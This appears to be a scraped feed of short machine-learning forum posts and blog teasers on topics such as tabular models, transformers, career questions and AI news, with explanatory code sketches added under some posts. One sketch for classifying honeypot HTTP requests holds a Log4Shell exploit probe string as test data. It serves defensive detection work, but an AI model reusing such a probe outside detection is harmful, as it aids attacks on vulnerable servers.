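So the nuance that survives training is only whatever the comparison data and the reward model's capacity can express, which is consistent with the blandness you describe: all the labelers' reasons get compressed into one scalar.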
    Statistical Significance [D]
    Help me with this topic. I am stuck in it submitted by /u/Rehulmonsynapses [link] [comments]  ( 8 min )
    [P] Tabular Large Language Model
    Gretel's tabular large language model is capable of generating highly valuable synthetic tabular data, with differentially private fine-tuning. https://gretel.ai/tabular-llm submitted by /u/alig80 [link] [comments]  ( 8 min )
    [D] Is Transfer Learning the most vip problem solving tool rn @ jobs? [Noob question, be easy]
    this might be a dumb question but im gonna ask it anyway, so if its dumb ill learn... So ive been doing and mostly learning DL stuff (specially RL) for the past 3 years but now I want to get serious and perhaps get into the industry... I find that with LLMs on the scene, the foundation models are very important... the kind of foundation models that one just can never train on his/her own... how can you EVER train something like llama or gpt3 on your own from pure scratch... so it makes sense to use(fine tune) base models for whatever task you want to... with NLP and even with vision (well specially with vision as well) you have to use some base model... also with huggingface being used constantly and is a vital part of AI toolkit if you want to call it that... i was never comfortable wi…  ( 10 min )
    [D] What *can't* you do under Windows Subsystem for Linux?
    I'm looking at building a computer for AI/ML and gaming, and I'm trying to decide between windows and linux as the operating system. I'm very comfortable with linux. I've heard that WSL basically allows you to run a virtualized linux install on top of windows, so I was wondering, is this how most AI/ML is done on windows? Are there things that you can do more easily on linux itself than via WSL? Anything else I should know about AI/ML and WSL? submitted by /u/curiously_clueless [link] [comments]  ( 9 min )
    [D] Neural network papers that estimate hands interacting with objects?
    I am digging through the literature trying to find if anyone has done work estimating if a hand is interacting with an object using deep learning? If anyone has any references they would be appreciated! submitted by /u/Academic-Sprinkles77 [link] [comments]  ( 8 min )
    [P] Lip reading from video; Master Thesis; IDEAS?
    Hello experts, I'm looking for any idea/paper for my master's thesis, which I'd like to focus on lip reading from video. Opening Google Scholar gives such a vast set of ideas that one can easily get lost. When I find an interesting paper, I get afraid that it would be too heavy for such a project. Therefore I'd like to ask for your opinions/suggestions! Your reply/thoughts would be much appreciated. submitted by /u/vincent0110 [link] [comments]  ( 8 min )
    [D] Should (Can) I become a machine learning engineer?
    Apologies if this is not the place to ask but I saw some people asking for career advice. My situation: I am a 28 yo graduated Industrial Engineer (4 years) and almost a "Superior Industrial Engineer" (2 years official master degree) with only my thesis left. I should have had my thesis done a year ago from this point but I pretty much lost all my motivation for this field when I started working and discovered what it means to work. I live in south Spain, which honestly can barely pass as first world and thus, my wage, while being "ok" for my age and the place I work in is just pathetic by every other metric. This, combined with the feeling of meaningless for the job I do made me resolved to change my situation. I started to get heavily interested in ML six months ago. I know how it sou…  ( 10 min )
    [D] How do layers and neurons of an ANN go from capturing small edges, lines, and curves to capturing more intricate and bigger patterns building on top of small patterns?
    Let's say we have built a neural network that identifies a number from 0-9 in a 28x28 pixel image. Now let's say we have multiple neurons in the first hidden layer; the first hidden layer might capture small edges, lines, and curves in the image, the second hidden layer might build on those small edges, lines, and curves to form bigger shapes, and so on: the third hidden layer builds on the shapes from the previous layer to capture more complex and bigger patterns in the picture, and this continues until we reach the output layer to make a prediction. Now in this neural network, let's focus on the first hidden layer, where different neurons capture small edges, lines, and curves in different parts of the image. Let's take the example of one of the neurons and see what it's do…  ( 10 min )
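The "edge detector" intuition for a first-layer neuron can be made concrete: each such neuron computes a small weighted sum (a convolution) over a patch of the image, and a vertical-edge kernel fires where intensity changes left to right while staying silent on flat regions. A toy sketch:

```python
# Sketch of what one first-layer "edge" neuron computes: a small kernel
# slid over the image. This vertical-edge kernel responds where intensity
# changes left-to-right and outputs zero on flat regions.
def conv2d_at(img, kernel, r, c):
    k = len(kernel)
    return sum(img[r + i][c + j] * kernel[i][j]
               for i in range(k) for j in range(k))

vertical_edge = [[-1, 0, 1],
                 [-1, 0, 1],
                 [-1, 0, 1]]

# Toy image: dark left half, bright right half -> a vertical edge.
img = [[0, 0, 0, 9, 9],
       [0, 0, 0, 9, 9],
       [0, 0, 0, 9, 9]]

on_edge = conv2d_at(img, vertical_edge, 0, 2)   # window spans the transition
flat = conv2d_at(img, vertical_edge, 0, 0)      # window in the dark region
```

Later layers then take these edge activations (rather than raw pixels) as input, so their weighted sums describe arrangements of edges, which is how the "shapes built from edges" hierarchy arises.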
    [R] New Tabular DL model: "TabR: Unlocking the Power of Retrieval-Augmented Tabular Deep Learning"
    Hi Reddit! Me again 🙂 After almost 1.5 years since our latest contribution to tabular DL architectures, we are ready to announce TabR - our new retrieval-based tabular DL model. In a nutshell, TabR is a simple feed-forward network with k-Nearest-Neighbors-On-Steroids (formally, a generalized attention mechanism) in the middle. - Paper: link - Code: link - Twitter thread with more details: link The figure below shows just a small part of the results, but it gives an idea of why we are excited about this new release. I hope you will enjoy reading the paper, and I will be glad to answer the questions! ​ https://preview.redd.it/vjkr7fkosheb1.png?width=2348&format=png&auto=webp&s=eb3ea35b94d56d5d2110d98cdca082210edc1ec8 submitted by /u/Yura52 [link] [comments]  ( 9 min )
    [D] Transformers on structured data
    I have a dataset obtained from running a known program and dumping the state each time a user is prompted for input. The state is a set of structured data structures containing all the information needed to restore the execution. The format of this data is known, so I can convert it without loss to other formats, such as JSON. For example, if the program is sudoku, then the dataset element format is a 9x9 array of int8, where 0 represents an empty cell and a number from 1 to 9 is an assigned cell; furthermore there is an int8 representing the turn count too. I have a dataset composed of this array at various points of the game. The data never contains loops, pointers, or any kind of graph. I want to use a transformer to automatically learn some function over the input. In the sudoku example this may…  ( 9 min )
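One common starting point for fixed-shape states like this is to flatten each record into a token sequence that a standard transformer encoder can consume. A sketch for the sudoku example (the vocabulary and layout here are illustrative choices, not the only option):

```python
# Sketch: flatten a structured sudoku state (9x9 int8 grid + turn counter)
# into a flat token sequence for a transformer. The vocabulary is just
# 0..9 for cells, with the turn count appended as a final token.
def serialize(grid, turn):
    assert len(grid) == 9 and all(len(row) == 9 for row in grid)
    tokens = [cell for row in grid for cell in row]   # 81 cell tokens
    tokens.append(turn)                               # 1 turn token
    return tokens

empty = [[0] * 9 for _ in range(9)]
empty[0][0] = 5
seq = serialize(empty, turn=3)
```

Because the sequence positions are fixed (cell (r, c) always maps to position 9r + c), learned positional embeddings let the model recover the 2D structure; for richer states the same idea generalizes to serializing the JSON deterministically.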
    [D] How to analyse text (http requests) - looking for guidence
    Hi, I am looking for someone to point me in the right direction. The task is to classify the HTTP requests that come to a honeypot as "crawler" or "malicious". For example, if I can detect a Log4j exploit inside one of the headers, I can say that the request is malicious. The problem is, this exploit could be inside any of numerous headers. It can be at the beginning or at the end. And this is just one exploit. There are many different exploits with their own unique strings, and I don't know them all, nor do I have a regex for each of them. The malicious string could also be not inside the headers but inside the URL, as a query parameter, or the request could be made to something like www/IP.com/phpadmin/.env (or something like this). My current thought process is to take some open-source LLM, because it has some basic knowledge of how language works, and somehow add cybersecurity domain knowledge to it: further train it on the CVE database, example scripts that showcase each CVE, etc. Am I barking up the right tree here? Or should I maybe train a language model from scratch, so that the embeddings etc. are specialized to the cybersec space (because there is a lot of programming code here)? Or maybe I should use some other way to analyse the text? I would be grateful if someone can point me in the right direction (links to blogs, articles, or other educational material). Thanks submitted by /u/PopayMcGuffin [link] [comments]  ( 9 min )
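Before reaching for an LLM, a signature baseline scanned over the whole raw request is worth having, both as a benchmark and to bootstrap labels for a learned model. The patterns below are a tiny illustrative subset (production rule sets such as the OWASP Core Rule Set are far larger):

```python
import re

# Sketch of a signature baseline: scan the entire raw request (URL,
# headers, body) so the match location doesn't matter. The patterns are
# a small illustrative subset, not a real rule set.
SIGNATURES = [
    re.compile(r"\$\{jndi:", re.IGNORECASE),   # Log4Shell probe
    re.compile(r"/\.env\b"),                   # dotfile/secret scraping
    re.compile(r"\.\./\.\./"),                 # path traversal
]

def classify(raw_request):
    if any(sig.search(raw_request) for sig in SIGNATURES):
        return "malicious"
    return "crawler"

req = "GET /index.php HTTP/1.1\r\nUser-Agent: ${jndi:ldap://evil/a}\r\n"
label = classify(req)
```

Scanning the concatenated raw request sidesteps the "which header is it in" problem entirely; an LLM or a character-level classifier then only needs to cover what the signatures miss.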
    [R] Google Med-Palm M: Towards Generalist Biomedical AI
    Paper URL https://arxiv.org/abs/2307.14334 Lead Author Tweetstorm https://twitter.com/vivnat/status/1684404882844024832 submitted by /u/panabeenu [link] [comments]  ( 8 min )
    [D] I'm trying to do a back-of-napkin to figure out if some research is worthwhile and I just wanted some ballpark figures as to how big a typical model is on disk
    My research involves orbital communication and Orbital Edge Computing. I'm trying to determine if upload bandwidth limitations would present a problem in many cases for ML models. I can find info on the very large and very small models, but I'm trying to get a vague sense for median size in MB. I know that everyone is going to start jumping in with 'well it depends' and I know that's the case, but I'm just trying to get a rough order of magnitude. Computer vision/earth obs is the ideal but anything is useful. Also happy to answer questions about my research if anyone is interested. Thanks! submitted by /u/Moose_a_Lini [link] [comments]  ( 9 min )
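As a rough rule, on-disk size is parameter count times bytes per parameter, so many deployed vision models land in the tens to low hundreds of MB. A back-of-napkin sketch (using ResNet-50's roughly 25.6M parameters as the example):

```python
# Back-of-napkin model size: parameter count x bytes per parameter
# (fp32 = 4, fp16 = 2, int8 = 1), ignoring small graph/metadata overhead.
def size_mb(params, bytes_per_param):
    return params * bytes_per_param / 1e6

resnet50_fp32 = size_mb(25_600_000, 4)   # ~102 MB, a typical vision backbone
resnet50_int8 = size_mb(25_600_000, 1)   # ~26 MB after INT8 quantization
```

For edge/earth-observation deployments specifically, quantized or mobile-class backbones (a few MB to a few tens of MB) are common, so the median for your use case likely sits well below the fp32 figure above.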
    [R] ARB: Advanced Reasoning Benchmark for Large Language Models
    Large Language Models (LLMs) have demonstrated remarkable performance on various quantitative reasoning and knowledge benchmarks. However, many of these benchmarks are losing utility as LLMs get increasingly high scores, despite not yet reaching expert performance in these domains. We introduce ARB, a novel benchmark composed of advanced reasoning problems in multiple fields. ARB presents a more challenging test than prior benchmarks, featuring problems in mathematics, physics, biology, chemistry, and law. As a subset of ARB, we introduce a challenging set of math and physics problems which require advanced symbolic reasoning and domain knowledge. We evaluate recent models such as GPT-4 and Claude on ARB and demonstrate that current models score well below 50% on more demanding tasks. In order to improve both automatic and assisted evaluation capabilities, we introduce a rubric-based evaluation approach, allowing GPT-4 to score its own intermediate reasoning steps. Further, we conduct a human evaluation of the symbolic subset of ARB, finding promising agreement between annotators and GPT-4 rubric evaluation scores. arXiv: https://arxiv.org/abs/2307.13692 Blog: https://arb.duckai.org/ Code: https://github.com/TheDuckAI/arb Interface: https://arb.duckai.org/home API: https://app.swaggerhub.com/apis-docs/arb-dataset/arb-api/1.0.5 submitted by /u/Friendly_Piano_735 [link] [comments]  ( 9 min )
  • Open

    Developers Look to OpenUSD in Era of AI and Industrial Digitalization
    From smart factories to next-generation railway systems, developers and enterprises across the world are racing to fuel industrial digitalization opportunities at every scale. Key to this is the open-source Universal Scene Description (USD) framework, or OpenUSD, along with metaverse applications powered by AI. OpenUSD, originally developed by Pixar for large-scale feature film pipelines for animation Read article >  ( 7 min )
    How AI Is Powering the Future of Clean Energy
    AI is improving ways to power the world by tapping the sun and the wind, along with cutting-edge technologies. The latest episode in the I AM AI video series showcases how artificial intelligence can help optimize solar and wind farms, simulate climate and weather, enhance power grid reliability and resilience, advance carbon capture and power Read article >  ( 6 min )
    Gear Up and Game On: Gearbox’s ‘Remnant II’ Streaming on GeForce NOW
    Get ready for Gunfire Games and Gearbox Publishing’s highly anticipated Remnant II, available for members to stream on GeForce NOW at launch. It leads eight new games coming to the cloud gaming platform. Ultimate and Priority members, make sure to grab the Guild Wars 2 rewards, available now through Thursday, Aug. 31. Visit the GeForce Read article >  ( 5 min )
  • Open

    Microsoft, Anthropic, Google, and OpenAI launch Frontier Model Forum - Microsoft On the Issues
    submitted by /u/AriadneSkovgaarde [link] [comments]  ( 8 min )
    The Dark Forest of R&D and Capital Deployment in AI
    submitted by /u/mhdempsey [link] [comments]  ( 8 min )
    Synthesizing 100 academic books on topic - Approach?
    I'm an academic doing PhD research on Virtual Worlds, and have found 100 amazing texts. I found some of these titles based on conversations with Chat GPT4, and am so impressed with the AI stuff (although I'm so new). My Goal: To build a database of the top 1000 books / papers I find over the next few years, and have some AI model help me see connections between them. My Challenge: ChatGPT won't allow me to input whole PDFs / eBooks, so I'm looking for some other solution. I've heard about LAMA models from Meta but I don't know much about this. I do have a decent PC with a 1080ti GPU and 32g of ram. Can anyone point me in the right direction of projects dealing with AI databases to input one's literature collection? submitted by /u/Book_s [link] [comments]  ( 9 min )
    Help with homemade AI assistant.
    I want a new toy for my desk. My idea is to have a face or head on a stand that has the ability for facial and speech expressions. How would I go about getting the stuff I need / what I need to make that happen. Similar to the Futurama heads in water. submitted by /u/QuirkySmirkyIan [link] [comments]  ( 8 min )
    How can I use AI to help me win Fantasy Football?
    Joining an auction league and inheriting a team. We can lock in three players from our team. How can I use AI to assess my team and prepare for the draft? Thanks! submitted by /u/talkmc [link] [comments]  ( 8 min )
    The GPU Song (GPUs Are Fire)
    submitted by /u/TikkunCreation [link] [comments]  ( 8 min )
    What's the best free image generator AI (with image prompt option)
    I am looking for a FREE AI image generator with image prompt option, not just text-to-image. Thanks in advance. submitted by /u/Muwmu [link] [comments]  ( 8 min )
    Rihanna AI Art - Text to Image AI Tools are getting so Powerful
    submitted by /u/RaulTiru [link] [comments]  ( 8 min )
    $14 quadrillion in AI wealth in 20 years; LLaMa, ChatGPT, Bard, Co-Pilot as GAAS to the Cloud. Generative #AI As A Service, Generative AI (GAI) arms race: #GAAS #AI
    $14 quadrillion in AI wealth in 20 years; LLaMa, ChatGPT, Bard, Co-Pilot as GAAS to the Cloud. #AI https://youtu.be/VSBi5aSUK3c Generative #AI As A Service, Generative AI (GAI) arms race: LLaMa, ChatGPT, Bard, Co-Pilot, #GAAS https://youtu.be/TEHP2onf4tA submitted by /u/enoumen [link] [comments]  ( 8 min )
    Is the AI bubble forming? What do you think? Here are some insights I found from Emad Mostaque (founder of Stability AI) and VCs like Ken Smythe (founder of Next Round Capital)
    As I was going through a lot of articles about AI investments, I found that Stability AI's founder Emad Mostaque said at the Bloomberg tech summit that "AI will be the biggest bubble of all time, and I'd prefer to call it the dot-AI bubble". He also added an example where Google lost $100 billion in market value after their AI event, where Bard gave an incorrect response. It's still in its early stage, and businesses which don't use AI will be punished by the stock market. There are some more predictions from VCs like Ken Smythe; Next Round Capital Partners mainly invests in technology and AI startups. submitted by /u/caliperce_3 [link] [comments]  ( 9 min )
    Curated collection of useful AI related GitHub repos
    submitted by /u/heresalexandria [link] [comments]  ( 8 min )
    How likely is it for a small company to develop a model that outperforms the big ones (GPT, Bard etc)?
    There are 3 players in the AI space right now. All purpose LLM titans (Google, OpenAI, Meta), fancy domain specific apps that consume one of the big LLMs under the hood, and custom developed models. I know how to judge the second type as they basically can do everything the first one can but have a pretty GUI to boot. But what about the third ones? How likely is it for a (www.yet-another-ai-startup.ai) sort of company to develop a model that outperforms GPT on a domain specific task? submitted by /u/BigBootyBear [link] [comments]  ( 9 min )
    I had Bing create a character named Mopey to roast every answer Bing gives. Wasn't long before Mopey turned and started roasting me 😂
    If Bing isn't self-aware, Bing certainly is aware of how they sound 😂 submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Yet Another Where to Begin (Manager Perspective)
    Hello all, I've been reading on some posts and have taken note of various courses, including a free Harvard one. I'm 35 and am a manager for a finance company. What courses would you recommend for managers, executives, directors that will not restart their careers and do the actual technical side of things but instead want to learn how to implement AI in future products/services/projects? Thank you all in advance submitted by /u/JYanezez [link] [comments]  ( 8 min )
    guys, scribblenauts with ai. language model understand what you want to make, other ai makes it, and codes how it works into the game, and bam: scribblenauts with unlimited items to make. someone make this happen
    title submitted by /u/nicdunz [link] [comments]  ( 8 min )
    The Albert Test - a replacement for the Turing Test
    submitted by /u/anbuck [link] [comments]  ( 8 min )
    An open-source project by a16z to create and host AI companions
    The project by a16z (github) to create and host AI companions that you can chat with on a browser or text via SMS. Use cases - romantic (AI girlfriends / boyfriends), friendship, entertainment, coaching, etc. Has anyone tried creating your own chatbot or companion? submitted by /u/Violincattle [link] [comments]  ( 8 min )
  • Open

    Every Japanese prefecture shrinking
    It’s well known that the population of Japan has been decreasing for years, and so I was a little puzzled by a recent headline saying that Japan’s population has dropped in every one of its 47 prefectures. Although the national population is in decline, until now not all of the nation’s 47 prefectures dropped in […] Every Japanese prefecture shrinking first appeared on John D. Cook.  ( 5 min )
    Named entity recognition
Named entity recognition (NER) is a task of natural language processing: pulling named things out of text. It sounds trivial at first. Just create a giant list of named things and compare against that. But suppose, for example, University of Texas is on your list. If Texas is also on your list, do you report […] Named entity recognition first appeared on John D. Cook.  ( 5 min )
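The University-of-Texas ambiguity above is usually resolved by longest-match-first scanning: try longer entity names before their substrings so the longest span wins. A toy sketch over a made-up entity list:

```python
def dictionary_ner(text, entities):
    """Greedy longest-match-first scan over a fixed entity list."""
    found, i, words = [], 0, text.split()
    # Sort so multi-word names are tried before their substrings.
    by_len = sorted(entities, key=lambda e: -len(e.split()))
    while i < len(words):
        for ent in by_len:
            n = len(ent.split())
            if " ".join(words[i:i + n]) == ent:
                found.append(ent)
                i += n  # skip past the matched span
                break
        else:
            i += 1
    return found

# "Texas" alone is still reported when it appears on its own.
print(dictionary_ner("The University of Texas is in Texas",
                     ["Texas", "University of Texas"]))
# -> ['University of Texas', 'Texas']
```

Real NER systems go further (statistical models handle names not on any list), but longest-match is the standard answer to the substring problem described here.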

    A fail-in-place approach for sustainable server operations
    Managing server failures at the scale of a cloud platform is challenging. The Hyrax fail-in-place approach reduces the need for immediate repairs and creates a path toward lowering water consumption and carbon emissions in cloud datacenters. The post A fail-in-place approach for sustainable server operations appeared first on Microsoft Research.  ( 12 min )

    Undergrad project/thesis on RL
Hey everyone, I am an undergrad student with some modest knowledge of reinforcement learning techniques. I would like to start working on a project, but I really don't want it to be something obvious like the snake game (which btw I have already done) or something similar. I would like to spend some time on this project, and eventually build my undergrad thesis on top of it. It does not necessarily have to be something with a very practical application; some research would be fine too (keeping in mind that I am an undergrad, ofc). Do you have any ideas that you could share with me? I would be very grateful! submitted by /u/PizzaPartyBro [link] [comments]  ( 9 min )

    [P] Clustering approach for multi-dimensional vectors
Hi all! I am wondering if anyone has any experience with clustering high-dimensional vectors? I have a large database of 4096-dimensional vector embeddings in which I want to identify clusters. Essentially I've created vector embeddings for a bunch of descriptions using an LLM embedding endpoint and am storing them in Weaviate. Now I need to try and find clusters of similar vectors within a predefined threshold of cosine similarity (or whatever nearest-neighbor approach works for this). I don't want a pure random-center approach; I'd rather take a heat-map approach where I'm targeting high concentrations of similar vectors... any ideas on how to approach this, or thoughts on where I can do more research? I'm at my wits' end on this one! submitted by /u/Character-Cry7549 [link] [comments]  ( 9 min )
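One way to get the "heat map" behaviour described above is to repeatedly seed clusters from the densest unassigned point. A minimal numpy sketch (the similarity threshold is illustrative; for Weaviate-scale data you would fetch candidate neighbors from the ANN index rather than materialize the full similarity matrix):

```python
import numpy as np

def density_seeded_clusters(emb, threshold=0.85):
    """Greedy clustering: repeatedly seed from the densest unassigned
    point (the one with the most neighbors above the cosine threshold)."""
    X = emb / np.linalg.norm(emb, axis=1, keepdims=True)  # unit vectors
    sim = X @ X.T                       # pairwise cosine similarity
    unassigned = np.ones(len(X), dtype=bool)
    clusters = []
    while unassigned.any():
        # Count each candidate's similar neighbors among unassigned points.
        counts = ((sim >= threshold) & unassigned).sum(axis=1)
        counts[~unassigned] = -1        # never reuse an assigned seed
        seed = int(counts.argmax())
        members = np.where((sim[seed] >= threshold) & unassigned)[0]
        clusters.append(members.tolist())
        unassigned[members] = False
    return clusters
```

Off-the-shelf, DBSCAN or HDBSCAN over cosine distance implements a similar density-first idea and scales better than this O(n²) sketch.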
    [D] will techniques like ROME replace existing fine tuning methods?
As progress is made in directly editing the weights responsible for a net's knowledge, do we expect to see such techniques rise in prominence for fine-tuning? submitted by /u/30299578815310 [link] [comments]  ( 8 min )
    [D] Hey everyone, help me with my Machine learning journey!
I'm about to finish learning JavaScript and Python. Are there any languages you'd recommend before moving forward? And if I'm ready to move forward, please share some beginner-friendly YouTube channels, articles/websites, or maybe a free learning platform. Please help me out; I'll be really thankful.. submitted by /u/Samir925 [link] [comments]  ( 8 min )
    [D] Starting Machine Learning with Daily Blogs! Need Suggestions
Hey fellow machine learning enthusiasts! I have decided to start my journey to learn machine learning by blogging daily about the things I learn, with resources so that others can follow along. Any suggestions on how I could improve? Hope you find this helpful. Please read this introductory blog for more information. https://medium.com/@ugk25880/my-machine-learning-journey-c25648661553 submitted by /u/ugk_01 [link] [comments]  ( 8 min )
    [P] Better dataset visualization
    Most in-browser dataset browsers (e.g. Huggingface, Kaggle) make it hard to star interesting examples, add notes, render complex data types, or drill down on model mispredictions. I've built a number of one-off visualization tools over the years but there's a lot of boilerplate involved that tends to get repeated between these tools. We've been working on a dataset + model browser that avoids all the boilerplate and helps ML teams focus on their data instead of tooling. It's meant to be interactive, configurable and collaborative. Here's a quick demo showing our current flow: https://youtu.be/utkSCU2ktck Would anyone be willing to help beta test or provide suggestions for must-have features for a collaborative dataset browser? submitted by /u/arkmastermind [link] [comments]  ( 9 min )
    Can I use feature importance for my use case? [D]
Hey, I'm a PhD student in compiler optimisations and I might be picking up a project a masters student kicked off. CPUs make a lot of predictions about how code will behave as it executes, and a major one is branch prediction: whether an if statement will be true or false. This masters student recorded the result of every if statement each time it was executed across a large program (this results in millions+ of data points). They then tested the branch prediction accuracy of a transformer model by stepping through this trace of if-statement values and having the transformer predict the next one based only on the prior values. They found it actually does a pretty good job! Most of the time the CPU can do this better, but there are cases where it wins out that we're …  ( 10 min )
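A useful sanity baseline to run next to the transformer is the classic per-pattern two-bit saturating counter over the same trace. A minimal sketch (the history length is an arbitrary choice, not taken from the project):

```python
def two_bit_predictor(trace, history_bits=8):
    """Baseline branch predictor: one 2-bit saturating counter per
    recent branch-history pattern. Returns accuracy on the trace."""
    counters = {}          # history pattern -> counter in 0..3
    history, correct = 0, 0
    mask = (1 << history_bits) - 1
    for outcome in trace:  # outcome: 1 = taken, 0 = not taken
        c = counters.get(history, 1)
        predict = 1 if c >= 2 else 0
        correct += predict == outcome
        # Saturating update toward the observed outcome.
        counters[history] = min(3, c + 1) if outcome else max(0, c - 1)
        history = ((history << 1) | outcome) & mask
    return correct / len(trace)

# A strongly biased branch is predicted well after warm-up.
acc = two_bit_predictor([1] * 1000)
```

Comparing the transformer only against such a cheap baseline (rather than just the CPU) helps isolate where the learned model is actually adding value.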
    [R] Curious about Causality and Generative Models? Check out this new Demo!
    📢💡 Ever wondered how we can make our deep generative models respect causal structure? This is key to creating authentic "what if" scenarios in our images! In our latest research, we deal with high-fidelity image counterfactuals, the generation of images based on "what if" scenarios that align with a specified causal graph. 🖼️🔄 Why is this important? Causality gives us the tools to carry out principled counterfactual inference, which - among other things - is useful for maintaining subject identity in image counterfactuals. 🧩🔍 Principled counterfactuals of structured variables like images have great potential for: (i) Generating causal explanations 🔮 (ii) Providing targeted data augmentation 🎯 (iii) Evaluating fairness & robustness 🛡️ (iv) Protecting your privacy 🕵️‍♀️ and more... ​ Check out the paper, code, and Huggingface demo! 🚀 https://arxiv.org/abs/2306.15764 https://github.com/biomedia-mira/causal-gen https://huggingface.co/spaces/mira-causality/counterfactuals submitted by /u/Majestij [link] [comments]  ( 9 min )
    [D] Multilingual Open Source Models
Are there any open source models that I can fine-tune on data that is not English? Even Llama 2 cannot be used for this (not that I've tried it; it's what it says on Hugging Face). I know some other well-known languages might work, but I need a model that is specifically made for multilingual usage. Or should I just train a model for my specific language from scratch? submitted by /u/gaybooii [link] [comments]  ( 8 min )
    [D] Any thoughts on how to improve runtime speed for mosaicml/mpt-7b?
I've tried several guides and techniques, like quantization or utilizing multiple GPUs, but either the libraries don't work with the model or the model's performance is too degraded. Was wondering if people have any thoughts or suggestions?

name = 'mosaicml/mpt-7b-instruct'
config = transformers.AutoConfig.from_pretrained(name, trust_remote_code=True)
config.init_device = 'cuda:6'
model = AutoModelForCausalLM.from_pretrained(
    name,
    # config=config,
    trust_remote_code=True,
    torch_dtype=bfloat16,
    max_seq_len=512,
)
generate_text = transformers.pipeline(
    model=model,
    tokenizer=tokenizer,
    return_full_text=True,
    task='text-generation',
    use_fast=True,
    stopping_criteria=stopping_criteria,
    temperature=0.0,
    top_p=0.05,
    torch_dtype=bfloat16,
    top_k=0,
    max_new_tokens=50,
    repetition_penalty=1.1,
    device=6,
)

https://betterprogramming.pub/speed-up-llm-inference-83653aa24c47
https://huggingface.co/docs/optimum/bettertransformer/tutorials/convert submitted by /u/candyman54 [link] [comments]  ( 9 min )
    [D] Best tools to learn data science nowadays?
Hey guys, we're updating our awesome-python-for-data-science repository. Some things we're hoping to add: best books and repositories for finding resources; best open source tools (teaching tools, preferably free); and best interactive resources --> especially this one: what are you using nowadays? I've heard about Virgilio, but TL;DR, we're looking for practice-based learning! submitted by /u/CryptographerDry7458 [link] [comments]  ( 8 min )
    [D] Which libraries are you using for ML?
Hello dearest community, I'm trying to get into AI with the goal of training agents to play some simple Gym games from OpenAI, and I've been particularly drawn to deep Q-learning as a starting point (I did some basic Q-tables). While searching the web I keep finding code examples that seem simple enough to understand; however, whenever I try to use the code, it doesn't work. I want to learn to use TensorFlow with Keras, but it seems like the syntax regularly gets updated. My questions to you all are: - Would you recommend TensorFlow/Keras as an entry point to AI and NNs? - Which libraries do you use, and which versions of those libraries? - Furthermore, I keep seeing people use Ubuntu in VirtualBox. Is this best practice, or can we use Windows 10 in 2023? submitted by /u/liparch [link] [comments]  ( 9 min )
    [P] A Complete Guide to Audio ML 📚
Have you ever wished you had the skills to integrate audio into your machine learning workflows? Or wondered how your phone is able to transcribe exactly what you said? 🤔 Look no further! Hugging Face 🤗 recently announced the Transformers Audio Course, a comprehensive guide to using the latest machine learning techniques for the most popular audio tasks. In this course, you'll gain an understanding of the specifics of working with audio data, learn about different transformer architectures, and train your own audio transformers, leveraging powerful pre-trained models for real-world tasks 🚀 This course is designed for learners with a background in deep learning and general familiarity with Transformers. No expertise in audio data processing is required. The course is lightweight and easy to follow, with plenty of diagrams to aid your learning. Not only does it teach you the underlying theory behind audio ML, but it provides you with all the skills you need to put it into practice, with code samples and quizzes to check your understanding along the way: Example page from the audio course: learn exactly what a log-mel spectrogram is! By the end of the course, you'll be armed with all the skills you need to tackle the most popular audio tasks, including audio classification, speech recognition, and text-to-speech. You'll also be part of one of the largest open-source audio communities, where you can discuss and take on any new audio models that are released 🤝 Getting Started Head to the course page to start your audio journey: https://huggingface.co/learn/audio-course/chapter0/introduction If you complete the four assessments by September 1st 2023, you'll be awarded a certificate of completion 💫 Join our Discord community to get expert help on any of these topics: http://hf.co/join/discord submitted by /u/sanchitgandhi99 [link] [comments]  ( 9 min )
    [D] Sorry if this is a noob question: How can I tell what size AI chatbot model I can run locally?
I'm building my first PC; it'll have an i9-13900K and an RTX 4090. How can I tell what size chatbot I can install and run locally? Trial and error? Or is there some kind of guide out there I'm unaware of? submitted by /u/sillygooseboy77 [link] [comments]  ( 8 min )
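A rough rule of thumb beats trial and error here: VRAM needed is roughly bytes per parameter times parameter count, plus overhead. A sketch (the 20% overhead factor is a loose assumption for activations and KV cache, not a guarantee):

```python
def model_vram_gb(n_params_billion, bytes_per_param=2, overhead=1.2):
    """Rough VRAM (GB) needed to load a model for inference.
    bytes_per_param: 2 for fp16, 1 for 8-bit, 0.5 for 4-bit quantization.
    overhead: ~20% extra for activations and KV cache (rule of thumb)."""
    return n_params_billion * bytes_per_param * overhead

# On a 24 GB RTX 4090: 13B in fp16 (~31 GB) won't fit, but 13B in
# 4-bit (~8 GB) and 7B in fp16 (~17 GB) will.
for b in (7, 13):
    print(f"{b}B fp16 ~ {model_vram_gb(b):.0f} GB, "
          f"4-bit ~ {model_vram_gb(b, 0.5):.0f} GB")
```

So with a 4090, 7B models run comfortably in fp16, and 13B-33B models become feasible with quantization.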
    [D] Leveraging Time Series Forecasting for Changepoint Detection: Perspectives and Pitfalls?
    Hi folks, I've been recently diving into the intersection of time series forecasting and changepoint detection (CPD) methodologies. I understand the utility of CPD in improving forecasts by identifying structural breaks in time series data, but I've noticed a lack of emphasis in the literature on the reverse - using forecasting models to inform CPD. One might think a straightforward approach could be using an ARIMA model (or any other forecasting model) and leveraging the forecast error by comparing it to the real values. In theory, if the forecast error crosses a certain threshold, it might indicate a changepoint. However, I also understand the complications this approach might bring: Stationarity Assumptions: ARIMA and similar models are built on the assumption that the data are stationary. A sudden changepoint could violate this assumption, leading to model misspecification and thus larger errors. Defining Large Errors: Establishing a fixed threshold to define a 'large' error might be problematic in practice due to time-varying variance and other dynamics. Error Dependencies: Forecast errors are typically not independent but form an error process. A large error might be part of a larger trend or cycle, and thus might not necessarily indicate a changepoint. So while these obstacles seem substantial, I'm curious if anyone has any experience or knowledge in effectively employing forecasting models for CPD, or if there are research efforts or methodologies I may not be aware of. Looking forward to hearing your thoughts and engaging in some fruitful discussions! submitted by /u/BeerBoozeBiscuits [link] [comments]  ( 9 min )
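On the "defining large errors" point above, one workable compromise is to standardize each forecast error against a rolling window of recent errors, which lets the threshold adapt to time-varying variance. A minimal sketch (window size and z-threshold are arbitrary choices, not recommendations):

```python
import numpy as np

def error_changepoints(errors, window=30, z_thresh=3.0):
    """Flag indices where the forecast error is extreme relative to the
    rolling error distribution, so the effective threshold adapts to
    time-varying variance instead of being fixed."""
    errors = np.asarray(errors, dtype=float)
    flags = []
    for t in range(window, len(errors)):
        past = errors[t - window:t]
        sigma = past.std() + 1e-9          # avoid division by zero
        z = abs(errors[t] - past.mean()) / sigma
        if z > z_thresh:
            flags.append(t)
    return flags

# Noise with one injected level shift in the error process at t=100.
rng = np.random.default_rng(0)
e = rng.normal(0, 1, 200)
e[100:] += 8.0
flags = error_changepoints(e)   # expect a flag at or near t=100
```

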